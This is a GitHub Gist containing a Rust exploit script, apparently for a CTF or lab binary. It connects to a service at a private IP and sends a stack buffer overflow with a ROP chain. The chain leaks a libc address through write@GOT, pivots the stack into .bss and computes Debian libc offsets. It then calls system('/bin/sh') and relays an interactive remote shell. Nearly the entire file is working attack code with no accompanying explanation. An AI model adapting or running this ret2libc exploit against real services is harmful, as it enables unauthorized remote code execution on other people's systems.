Created
August 22, 2017 04:42
-
-
Save Tosainu/4dff2b6309b84351e96a54f6595edde8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use std::io::prelude::*; | |
| use std::io; | |
| use std::net::TcpStream; | |
| fn p_32(v: u32) -> [u8; 4] { | |
| [ | |
| ((v & 0x000000ff)) as u8, | |
| ((v & 0x0000ff00) >> 8) as u8, | |
| ((v & 0x00ff0000) >> 16) as u8, | |
| ((v & 0xff000000) >> 24) as u8, | |
| ] | |
| } | |
| fn u_32(v: &[u8; 4]) -> u32 { | |
| v[0] as u32 | ((v[1] as u32) << 8) | ((v[2] as u32) << 16) | ((v[3] as u32) << 24) | |
| } | |
| fn main() { | |
| { | |
| assert_eq!(p_32(0xdeadbeef), [0xef, 0xbe, 0xad, 0xde]); | |
| assert_eq!(u_32(&[0xef, 0xbe, 0xad, 0xde]), 0xdeadbeef); | |
| } | |
| let bss = 0x08049628; | |
| let read_plt = 0x0804832c; // 0x080483f4 41 sub.read_3f4 | |
| let read_got = 0x0804961c; // 0x08049614 4 reloc.write_20 | |
| let write_plt = 0x0804830c; // 0x0804830c 6 sym.imp.write | |
| let ret = 0x080482ca; // 0x080482ca: ret ; (13 found) | |
| let leave_ret = 0x080482ea; // 0x080482ea: leave ; ret ; (5 found) | |
| let pop_ebp_ret = 0x080483c3; // 0x080483c3: pop ebp ; ret ; (4 found) | |
| let pop3ret = 0x080484b6; // 0x080484b6: pop esi ; pop edi ; pop ebp ; ret ; (1 found) | |
| // archlinux | |
| // let offset_libc_read = 0x000dc260; // 0x000dc260 101 sym.read | |
| // let offset_libc_system = 0x0003c170; // 0x0003c170 55 sym.system | |
| // let offset_libc_bin_sh = 0x00167268; // vaddr=0x00167268 paddr=0x00167268 ordinal=699 sz=8 len=7 section=.rodata type=ascii string=/bin/sh | |
| // debian | |
| let offset_libc_read = 0x000dbce0; | |
| let offset_libc_system = 0x0003e3e0; | |
| let offset_libc_bin_sh = 0x0015f551; | |
| let mut stream = TcpStream::connect("192.168.122.172:4000").unwrap(); | |
| // thread::sleep_ms(5000); | |
| { | |
| let mut buf: Vec<u8> = Vec::new(); | |
| buf.extend_from_slice(&[0x41; 140]); | |
| // write(0x1, read_got, 0x04) -> pop3ret | |
| buf.extend(p_32(write_plt).iter()); | |
| buf.extend(p_32(pop3ret).iter()); | |
| buf.extend(p_32(0x1).iter()); | |
| buf.extend(p_32(read_got).iter()); | |
| buf.extend(p_32(0x4).iter()); | |
| // read(0x0, .bss + 0x800, 0x100) -> pop3ret | |
| buf.extend(p_32(read_plt).iter()); | |
| buf.extend(p_32(pop3ret).iter()); | |
| buf.extend(p_32(0x0).iter()); | |
| buf.extend(p_32(bss + 0x800).iter()); | |
| buf.extend(p_32(0x100).iter()); | |
| // stack pivoting | |
| buf.extend(p_32(pop_ebp_ret).iter()); | |
| buf.extend(p_32(bss + 0x800).iter()); | |
| buf.extend(p_32(leave_ret).iter()); | |
| let _ = stream.write(&buf); | |
| } | |
| let libc_read; | |
| { | |
| let mut b: [u8; 4] = [0; 4]; | |
| let _ = stream.read(&mut b); | |
| libc_read = u_32(&b); | |
| } | |
| let libc_base = libc_read - offset_libc_read; | |
| let libc_system = libc_base + offset_libc_system; | |
| let libc_bin_sh = libc_base + offset_libc_bin_sh; | |
| println!("[+] libc_base = 0x{:x}", libc_base); | |
| println!("[+] libc_system = 0x{:x}", libc_system); | |
| println!("[+] libc_bin_sh = 0x{:x}", libc_bin_sh); | |
| { | |
| let mut buf: Vec<u8> = Vec::new(); | |
| buf.extend(p_32(ret).iter()); | |
| buf.extend(p_32(libc_system).iter()); | |
| buf.extend(p_32(0xdeadbeef).iter()); | |
| buf.extend(p_32(libc_bin_sh).iter()); | |
| let _ = stream.write(&buf); | |
| } | |
| // FIXME: | |
| loop { | |
| // stdin -> stream | |
| let mut l = String::new(); | |
| io::stdin().read_line(&mut l).expect("Failed to read line"); | |
| let _ = stream.write(&l.into_bytes()); | |
| // stream -> stdout | |
| let mut b: [u8; 512] = [0; 512]; | |
| let length = stream.read(&mut b).unwrap(); | |
| io::stdout().write(&b[0..length]).unwrap(); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment